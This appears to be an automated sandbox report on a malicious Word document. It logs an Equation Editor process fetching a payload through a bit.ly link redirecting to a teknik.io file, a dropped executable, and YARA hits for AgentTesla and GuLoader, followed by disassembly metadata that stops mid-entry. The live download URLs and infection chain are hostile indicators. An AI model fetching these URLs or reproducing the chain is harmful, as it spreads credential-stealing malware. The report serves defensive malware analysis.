Feb 24, 2021 13:06:50.288167953 CET	8.8.8.8	192.168.2.22	0x26d4	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 24, 2021 13:06:50.494493961 CET	8.8.8.8	192.168.2.22	0x437e	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 13:06:50.494493961 CET	8.8.8.8	192.168.2.22	0x437e	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)
Feb 24, 2021 13:08:14.049120903 CET	8.8.8.8	192.168.2.22	0x1e5e	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 13:08:15.239042044 CET	8.8.8.8	192.168.2.22	0x60f4	No error (0)	cbzrfq.bl.files.1drv.com	bl-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 13:08:15.239042044 CET	8.8.8.8	192.168.2.22	0x60f4	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

bit.ly

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	67.199.248.11	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 13:06:50.315624952 CET	0	OUT	GET /3qO7045 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bit.ly Connection: Keep-Alive
Feb 24, 2021 13:06:50.422799110 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 24 Feb 2021 12:06:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 116 Cache-Control: private, max-age=90 Location: https://u.teknik.io/PWua8.txt Set-Cookie: _bit=l1oc6O-1f1018e00109e7d832-00p; Domain=bit.ly; Expires=Mon, 23 Aug 2021 12:06:50 GMT Via: 1.1 google Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 50 57 75 61 38 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/PWua8.txt">moved here</a></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2276 Parent PID: 584

General

Start time:	13:06:36
Start date:	24/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f990000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2368 Parent PID: 584

General

Start time:	13:06:38
Start date:	24/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 69577.exe PID: 2484 Parent PID: 2368

General

Start time:	13:06:41
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	5D2D34449323C67BA1F5EC7561DF2204
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 12%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 2464 Parent PID: 2484

General

Start time:	13:07:56
Start date:	24/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0x1340000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: dw20.exe PID: 2248 Parent PID: 2464

General

Start time:	13:08:11
Start date:	24/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 1612
Imagebase:	0x10000000
File size:	33936 bytes
MD5 hash:	FBA78261A16C65FA44145613E3669E6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RegAsm.exe PID: 2464 Parent PID: 2484 RegAsm.exeCOMMON

Executed Functions

Function 00096AA5, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 313nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00096555,00000040,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00096A78

Strings

%>\m, xrefs: 00096B58

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: %>\m
API String ID: 2706961497-3176154935
Opcode ID: bb70bf650f67ed9872ab7dc19d2fa617d9438ee2d03269d25daa4fefa54162b7
Instruction ID: 0150a2b489b600d48b962ce79b0cda55b25f428b3aa43ccf78e27e4146944305
Opcode Fuzzy Hash: bb70bf650f67ed9872ab7dc19d2fa617d9438ee2d03269d25daa4fefa54162b7
Instruction Fuzzy Hash: B371167222C744CFEF798B24C894B7937A5EB52310F65419FE48BC71A2D62A8885F712

Uniqueness

Uniqueness Score: -1.00%

Function 0009729D, Relevance: 5.0, APIs: 1, Strings: 1, Instructions: 1485COMMON

Download Yara Rule

Strings

d, xrefs: 00097266

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 607ad5bcd42f60651aeafbd6d8bf10c03a1d52f9bda3ac3941f235cad95a0c65
Instruction ID: 2378dfa5b28b838766085209277d1d733623ccb1609cbbabd6f77877f6ba6ecf
Opcode Fuzzy Hash: 607ad5bcd42f60651aeafbd6d8bf10c03a1d52f9bda3ac3941f235cad95a0c65
Instruction Fuzzy Hash: 590220B194C3D38E8352AF7C8C317857FE5D9167353288799D0E4AB7E7D32448829B86

Uniqueness

Uniqueness Score: -1.00%

Function 00096A7D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 334COMMON

Download Yara Rule

Strings

%>\m, xrefs: 00096B58

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID: %>\m
API String ID: 0-3176154935
Opcode ID: 2849bf9ccf7c9e38052b2d46aabeb8ba040fbf47e9442e04da1c310f80fea255
Instruction ID: 1e034ac41c98a69e01898e8f13e690c887f6725e6272395f811a3fad10946c03
Opcode Fuzzy Hash: 2849bf9ccf7c9e38052b2d46aabeb8ba040fbf47e9442e04da1c310f80fea255
Instruction Fuzzy Hash: 8F81297262C740CFEF798B24C894B7937A5EB42314F65019FD48BC7193D62A8885F702

Uniqueness

Uniqueness Score: -1.00%

Function 00096B15, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

%>\m, xrefs: 00096B58

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID: %>\m
API String ID: 0-3176154935
Opcode ID: 42650951157e3118cd87560828b52547ad2fb633b33f15bac68047c68bcde2b4
Instruction ID: 034f74f3c683655b827f38e96977636cfaa6d10ddcf1f43b323cd3f315e70660
Opcode Fuzzy Hash: 42650951157e3118cd87560828b52547ad2fb633b33f15bac68047c68bcde2b4
Instruction Fuzzy Hash: 4B814A7222C744DFEF798B24C894B7937A1EB52310F65019FE48BC71A2D22A8C85F712

Uniqueness

Uniqueness Score: -1.00%

Function 00096A7F, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

%>\m, xrefs: 00096B58

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID: %>\m
API String ID: 0-3176154935
Opcode ID: 27792361f1147fb6b812d15da78f3a0fffcbfbe4e936bcea58c80e17850fa6cb
Instruction ID: bb0e206af56592a34ad03e1e20042e523837fbc90276be8797a3f5f9cc38862b
Opcode Fuzzy Hash: 27792361f1147fb6b812d15da78f3a0fffcbfbe4e936bcea58c80e17850fa6cb
Instruction Fuzzy Hash: 8881283262C744CFEF799B24C894B7937A1DF52310F65419FE48BCB1A2D62A8885F712

Uniqueness

Uniqueness Score: -1.00%

Function 00096ABF, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

%>\m, xrefs: 00096B58

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID: %>\m
API String ID: 0-3176154935
Opcode ID: ba919263df2efa8707d0ff4448f092f5c6bf9f352d71dd940b30632c4faf9003
Instruction ID: a4d82186a4b85d16072fb9a2f32534d4b7c65a4615dc602d4c8e6670c64a08a6
Opcode Fuzzy Hash: ba919263df2efa8707d0ff4448f092f5c6bf9f352d71dd940b30632c4faf9003
Instruction Fuzzy Hash: E4712B7222C744CFEF799724C894B7937A1EF52310F65019FE48AC71A2D62A8C85F752

Uniqueness

Uniqueness Score: -1.00%

Function 00096AF6, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

%>\m, xrefs: 00096B58

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID: %>\m
API String ID: 0-3176154935
Opcode ID: 02998913a872a4d5a151abd79ca925ef238f230053c6ea745fc881ec3d99bf2c
Instruction ID: aa981f17b1934a670eac85dc94f0147d1269f4b1e5e877c6ecf745cecaeebc53
Opcode Fuzzy Hash: 02998913a872a4d5a151abd79ca925ef238f230053c6ea745fc881ec3d99bf2c
Instruction Fuzzy Hash: 63713B7222C744CFEF799B24C894B7D37A1EB52310F65019FE48BC71A2D62A8885F712

Uniqueness

Uniqueness Score: -1.00%

Function 00096FA1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

l[X, xrefs: 00096F6E

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID: l[X
API String ID: 0-4223491534
Opcode ID: d1ce32074d050a1bcdbb183a5ef2139c4ce82c86e624f5b1a13062f5f616d32e
Instruction ID: dd914b4dc74a695b738d90693ce6bfc2aca4f7d514cc4d37bc4afab7ec6645ce
Opcode Fuzzy Hash: d1ce32074d050a1bcdbb183a5ef2139c4ce82c86e624f5b1a13062f5f616d32e
Instruction Fuzzy Hash: D2411B2362C305CFEF3A4A14D9647AC2A929B42715FA501ABE85AD72A1D32788C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 00096F2E, Relevance: 3.2, APIs: 2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009f042e1856f7bf0fe1c62660ea84d30d8d429c7ff74258d65a9bdaf19be6e5
Instruction ID: 336472cef926cce344ca0254837931031f846f371d52213a253f89087dd00fd7
Opcode Fuzzy Hash: 009f042e1856f7bf0fe1c62660ea84d30d8d429c7ff74258d65a9bdaf19be6e5
Instruction Fuzzy Hash: 1B41553263C705CEEF3A5A64ED947BC22919B81325FB4022BE85BC61D1D33588C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 00096E84, Relevance: 1.8, APIs: 1, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0f157fb3c81d2b7bdb4bd4743a3801b239ed82c7dfc1d6c403fcfc1ea9d51c
Instruction ID: f8b7a9c78307467f8e2df565ca3069bd7147838b6b2a899d44214aac65bd7888
Opcode Fuzzy Hash: ca0f157fb3c81d2b7bdb4bd4743a3801b239ed82c7dfc1d6c403fcfc1ea9d51c
Instruction Fuzzy Hash: 8041CA3263C341CFEF7A4764C9647AC27A19F42714F6905ABD45ACB1E1D3268884F752

Uniqueness

Uniqueness Score: -1.00%

Function 00096F75, Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de2f9c4735c6c14ca21807670780a42c60b04200c47800b6734a4b419aa982ca
Instruction ID: ed9a9a15aef0e3c91d1d48b93c1f7505d06258bbaef70bb2c56bf89eb03811f2
Opcode Fuzzy Hash: de2f9c4735c6c14ca21807670780a42c60b04200c47800b6734a4b419aa982ca
Instruction Fuzzy Hash: 26412B2373C705CFEF7A4A14D9647AC2A929B51314FB4067FE95BC62A1D32688C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 00096F47, Relevance: 1.6, APIs: 1, Instructions: 143librarynativeCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A
NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadProcessQuery
String ID:
API String ID: 1311672033-0
Opcode ID: 379fa8465d2494e7d42f99abec5dad83abbcdf29b44da4d09ae188abb87e1e38
Instruction ID: 4401f52ae44d2383617acdc2d186a1234c39f6a2480602a36c07fef780e4211c
Opcode Fuzzy Hash: 379fa8465d2494e7d42f99abec5dad83abbcdf29b44da4d09ae188abb87e1e38
Instruction Fuzzy Hash: C741DA3263C705CFEF3A4A14C9647AC26A29B51724FB5066FE85BC72E1D72688C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 00097081, Relevance: 1.6, APIs: 1, Instructions: 131nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 0ec519dd7d0cc9a7121519cea26373d74449422fb7845b598962313947e9f6a4
Instruction ID: d79255ebcf17f70d5b35c03be2fed93a7acbaf871a394216c5090840bd30abfb
Opcode Fuzzy Hash: 0ec519dd7d0cc9a7121519cea26373d74449422fb7845b598962313947e9f6a4
Instruction Fuzzy Hash: F841193373C305DFEF3A0A14C9547AC2A929B51325FA4466BE85E973E1D32688C4F741

Uniqueness

Uniqueness Score: -1.00%

Function 00096FBD, Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845040496f4e88afdaaf7ecd7859dc7142328bf1da2bd047c293cb6adb723fbe
Instruction ID: 96640e854a260596d3aff35955c2d91754530403d0d1fc8341ef3f88f7b733c7
Opcode Fuzzy Hash: 845040496f4e88afdaaf7ecd7859dc7142328bf1da2bd047c293cb6adb723fbe
Instruction Fuzzy Hash: 6D41083363C305CFEF7A4B14D9647AC2A92AB51311FA4466BE94AD72A1D33688C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 00096FD8, Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 4ae30b55fad1c4b84d824ce418edbdb8ed876f59f7288225cd545cd5207a05a2
Instruction ID: 82ffbe6402b48794f25f913e0f63834af4ccc00c35fd9d6425f64fa9ad5f1888
Opcode Fuzzy Hash: 4ae30b55fad1c4b84d824ce418edbdb8ed876f59f7288225cd545cd5207a05a2
Instruction Fuzzy Hash: 2D31163363C305CFEF394B14C9547AC26919B51325FB4066BE85E862E0D33688C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 00097013, Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 9a0e1f474487b9a019fb9fd953da0cee56008229e371560370e47473878b54d6
Instruction ID: 33dce9d127521a7a39cbb9b51169e83544f78d7c26836a429855c0e86930082d
Opcode Fuzzy Hash: 9a0e1f474487b9a019fb9fd953da0cee56008229e371560370e47473878b54d6
Instruction Fuzzy Hash: 4F31E73363C705CFEF3A4B14C9947AC2692AB51325F64466BE95E962E0D33688C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 0009705C, Relevance: 1.6, APIs: 1, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 87b97a8bb2021dcaadd36a303fb1118bf2241306617fc8b8f14f215d075d457d
Instruction ID: f6ac20dc743b936f59205bbf14eb3ad4d40cfaf78100bdb17965302ba621dd3d
Opcode Fuzzy Hash: 87b97a8bb2021dcaadd36a303fb1118bf2241306617fc8b8f14f215d075d457d
Instruction Fuzzy Hash: EC31853373C301CEEF3A4B14C9587B82691AB52725FA9155FD89E861A1D73488C4F752

Uniqueness

Uniqueness Score: -1.00%

Function 00097097, Relevance: 1.6, APIs: 1, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 728cd051efd473a507d5d2274dedd48119f1dcb45ba776f41231b243c53a6bb9
Instruction ID: 5d8bcef3718b6a38f1ea975a928ef7354d23e6bc323a2e52db84a024b8ffc4d9
Opcode Fuzzy Hash: 728cd051efd473a507d5d2274dedd48119f1dcb45ba776f41231b243c53a6bb9
Instruction Fuzzy Hash: 8C21A23373C706CFEF3A471489587B82AA19B52710F78069FE89E862A1D72588C4B742

Uniqueness

Uniqueness Score: -1.00%

Function 00097007, Relevance: 1.6, APIs: 1, Instructions: 91librarynativeCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A
NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadProcessQuery
String ID:
API String ID: 1311672033-0
Opcode ID: fe24583876c4ef24fe3666575ceab472ceef28b42064964a68d6692d8c6ca3a0
Instruction ID: f8981ed8848c9ed512c2da7ece1885c2241b7e18e778155b060cab01896deb61
Opcode Fuzzy Hash: fe24583876c4ef24fe3666575ceab472ceef28b42064964a68d6692d8c6ca3a0
Instruction Fuzzy Hash: C731C13373C301CEEF394B14C8587BC2691AB92321FA8565FE89E861A0D73588C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 000970C9, Relevance: 1.6, APIs: 1, Instructions: 91nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 08c75e6636a4faab5ab6ac4d9ee72e36c873795e6e4241225c3ba2c2f314983e
Instruction ID: d03049faaa2050e98d240a883a8f46b9c6acd375a397b0c2656cbe8706719b9d
Opcode Fuzzy Hash: 08c75e6636a4faab5ab6ac4d9ee72e36c873795e6e4241225c3ba2c2f314983e
Instruction Fuzzy Hash: E131C13373C306DFEF7A4724845976C3A91AB52315F68469BE89E862A1D3358884B742

Uniqueness

Uniqueness Score: -1.00%

Function 000970B2, Relevance: 1.6, APIs: 1, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: bca4be035cfd082d0257af2b19ec67728a70cdbcb04115486944a9b42e337000
Instruction ID: 58bc4c61f5e7fd3b713a3508691ebeb2f12d65f3c29e6b28c428d19750526479
Opcode Fuzzy Hash: bca4be035cfd082d0257af2b19ec67728a70cdbcb04115486944a9b42e337000
Instruction Fuzzy Hash: AF21833373C305CEEF794B14C5587BC2A91AB51714F64565FE89E862A0D73588C4B742

Uniqueness

Uniqueness Score: -1.00%

Function 00097151, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 2ad49cfa5c600e9c3b177c3efb1dffb07de82e82bba21c6939769d929ac75299
Instruction ID: 39c3599b530fecec48da8b17be0c3cc2264610e6eee83e9299274da9612affa8
Opcode Fuzzy Hash: 2ad49cfa5c600e9c3b177c3efb1dffb07de82e82bba21c6939769d929ac75299
Instruction Fuzzy Hash: 30210D3363D346CFEF7A5B1885993683B919F12310F65459FE89D8A2B2E32548C4F711

Uniqueness

Uniqueness Score: -1.00%

Function 0097AF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0097AF87

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: e82564a4c140a7bb212d1284f00cf3bdf0e25243b2b3884f162f95a2cbbd447a
Instruction ID: 3f6d0422b48381d57a636f0d79cc19cfbddaefa990e1296f6cff60c10f0edc55
Opcode Fuzzy Hash: e82564a4c140a7bb212d1284f00cf3bdf0e25243b2b3884f162f95a2cbbd447a
Instruction Fuzzy Hash: E821B1B65097809FDB228F25DC44B52BFB8EF56310F08849AE9848B163D275D808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0009710B, Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b1801e92fc8330c0b030f216afe6ca0400e496bc12ab96e501d8a6203f465704
Instruction ID: 27152508f9cebd2baf1feb68d064566c17b7a14d6c69a038a953e0741f2b47a0
Opcode Fuzzy Hash: b1801e92fc8330c0b030f216afe6ca0400e496bc12ab96e501d8a6203f465704
Instruction Fuzzy Hash: DF21023373C30ACFEF7A4B14C4993682A929B52711F74469FE85D862A1D33648C4F742

Uniqueness

Uniqueness Score: -1.00%

Function 0097B089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0097B0F5

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 08ab91e86f445adb28deb3b6250b9494849a38bb646cf0b062b189cda7adb3ec
Instruction ID: b1e90b0f00411293854e772412e9678cfa9199e79a12ead0bfd521794377a140
Opcode Fuzzy Hash: 08ab91e86f445adb28deb3b6250b9494849a38bb646cf0b062b189cda7adb3ec
Instruction Fuzzy Hash: 36118E725093C49FDB228F15DC45B92FFB4EF16314F0980DAE9848B163D275A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 000971A9, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: d27b9bd45b7f9c0ed41030f3618bb59cdc72d4cd3c9711d97f91c9c021d24c01
Instruction ID: eccf8922ab7ea60f4718711fcfe0889e99198f00c9c35b92cd75511a05881b45
Opcode Fuzzy Hash: d27b9bd45b7f9c0ed41030f3618bb59cdc72d4cd3c9711d97f91c9c021d24c01
Instruction Fuzzy Hash: 0901B13373D306CFEF7A1728959537C2A925B22714F780A5FAC5EC63A1E22548C4B352

Uniqueness

Uniqueness Score: -1.00%

Function 0097AF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0097AF87

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 3ce8189be779b68b8fe51c6ac8e4fa533dad07814d2e943f9392d363a0ea5114
Instruction ID: 0ab8333e4693fedcc7d05b41d36c30db7a486b3820822325937c5daedfd56fe2
Opcode Fuzzy Hash: 3ce8189be779b68b8fe51c6ac8e4fa533dad07814d2e943f9392d363a0ea5114
Instruction Fuzzy Hash: AE119E765007009FEB20CF55DC84B56FBE8EF44320F08C46AED498B652D775E814DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0009717A, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 5ce084e20be2f5ec8d5d940fffba25da08ad1e8808a4c1b3c29999ab91fb7f7d
Instruction ID: 7cd1ad32e61687580a1c1957622af632af4ab49a641c2d87ee7c34916e9163b1
